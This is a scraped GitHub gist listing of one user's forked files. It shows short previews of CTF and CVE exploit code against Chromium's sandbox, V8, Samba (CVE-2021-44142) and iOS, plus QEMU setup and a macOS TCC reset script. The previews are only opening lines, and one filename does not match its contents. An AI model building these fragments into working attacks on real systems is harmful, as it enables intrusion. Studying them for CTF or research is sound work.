sudo apt install qemu-system-arm qemu-system-mips qemu-efi-aarch64 qemu-kvm qemu-efi cloud-image-utils
dd if=/dev/zero of=flash0.img bs=1M count=64
dd if=/usr/share/qemu-efi/QEMU_EFI.fd of=flash0.img conv=notrunc
bb33bb
/ tcc-reset.py
Created
December 2, 2021 06:12
— forked from haircut/tcc-reset.py
Completely reset TCC services database in macOS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| """ | |
| Completely reset TCC services database in macOS | |
| Note: Both the system and individual users have TCC databases; run the script as both | |
| a user and as root to completely reset TCC decisions at all levels. | |
| 2018-08-15: Resetting the 'Location' service fails; unknown cause | |
| 2018-08-16: Confirmed the 'All' service does not really reset _all_ | |
| services, so individual calls to each service is necessary. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function sleep( sleepDuration ){ | |
| var now = new Date().getTime(); | |
| while(new Date().getTime() < now + sleepDuration){ /* do nothing */ } | |
| } | |
| function gc() { | |
| for (let i = 0; i < 0x10; i++) { | |
| new ArrayBuffer(0x1000000); | |
| } | |
| } | |
| let data_view = new DataView(new ArrayBuffer(8)); |
bb33bb
/ exploit.html
Created
February 14, 2022 13:37
— forked from ujin5/exploit.html
0CTF/TCTF 2020 Quals Chromium
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script id="worker1"> | |
| worker:{ | |
| if (typeof window === 'object') break worker; | |
| self.onmessage = function() { | |
| console.log("onmessage") | |
| } | |
| } | |
| </script> | |
| <script src="../mojo_bindings.js"></script> | |
| <script src="../third_party/blink/public/mojom/tstorage/tstorage.mojom.js"></script> |
bb33bb
/ CVE-2021-44142.py
Created
February 20, 2022 01:33
— forked from 0xsha/CVE-2021-44142.py
CVE-2021-44142 PoC Samba 4.15.0 OOB Read/Write
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # CVE-2021-44142 PoC Samba 4.15.0 OOB Read/Write | |
| # (C) 2022 - 0xSha.io - @0xSha | |
| # This PoC is un-weaponized and for educational purposes only . | |
| # To learn how to use the PoC please read the writeup : | |
| # https://0xsha.io/blog/a-samba-horror-story-cve-2021-44142 | |
| # requires samba4-python | |
| # Refrences : | |
| # https://www.thezdi.com/blog/2022/2/1/cve-2021-44142-details-on-a-samba-code-execution-bug-demonstrated-at-pwn2own-austin | |
| # Patch : https://attachments.samba.org/attachment.cgi?id=17092 |
bb33bb
/ exploit.c
Created
March 1, 2022 05:46
— forked from jakeajames/exploit.c
leak address of segment_list in oob_timestamp
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // exploit.c | |
| // extra_time | |
| // | |
| // Created by Jake James on 2/8/20. | |
| // Copyright © 2020 Jake James. All rights reserved. | |
| // | |
| #include "exploit.h" | |
| #include "IOAccelerator_stuff.h" |
bb33bb
/ UB18-Qemu-AARCH64.md
Created
March 18, 2022 07:20
— forked from itzurabhi/UB18-Qemu-AARCH64.md
Run Ubuntu 18.04 on Qemu AARCH64 / ARM64
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdlib.h> | |
| #include <stdio.h> | |
| #include <pthread/pthread.h> | |
| #include <mach/mach.h> | |
| struct ool_msg { | |
| mach_msg_header_t hdr; | |
| mach_msg_body_t body; | |
| mach_msg_ool_ports_descriptor_t ool_ports[]; | |
| }; |
bb33bb
/ index.html
Created
April 20, 2022 15:22
— forked from hkraw/index.html
GoogleCtf 2021 fullchain
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <title>google-ctf fullchain</title> | |
| </head> | |
| <body> | |
| <h1>HK</h1> | |
| <pre id='log'></pre> | |
| </body> | |
| <script src='./mojo/mojo_bindings.js'></script> | |
| <script src="./mojo/third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script> |
bb33bb
/ should've_had_a_v8_exploit.md
Created
April 20, 2022 15:23
— forked from hkraw/should've_had_a_v8_exploit.md
UIUCTF-2021
let wasm_code = new Uint8Array([
0, 97,115,109, 1, 0, 0, 0, 1,133,128,128,128, 0,
1, 96, 0, 1,127, 3,130,128,128,128, 0, 1, 0, 4,
132,128,128,128, 0, 1,112, 0, 0, 5,131,128,128,128,
0, 1, 0, 1, 6,129,128,128,128, 0, 0, 7,145,128,
128,128, 0,2,6,109,101,109,111,114,121,2,0,4,109,97,
105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,
0,65,42,11
bb33bb
/ 0ctf2020-fullchain++-cfi.html
Created
April 20, 2022 15:25
— forked from hkraw/0ctf2020-fullchain++-cfi.html
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <title>0ctf sbx</title> | |
| </head> | |
| <body> | |
| <h1>HK</h1> | |
| <pre id='log'></pre> | |
| </body> | |
| <script src='./mojo_bindings.js'></script> | |
| <script src='./mojo_js/third_party/blink/public/mojom/tstorage/tstorage.mojom.js'></script> |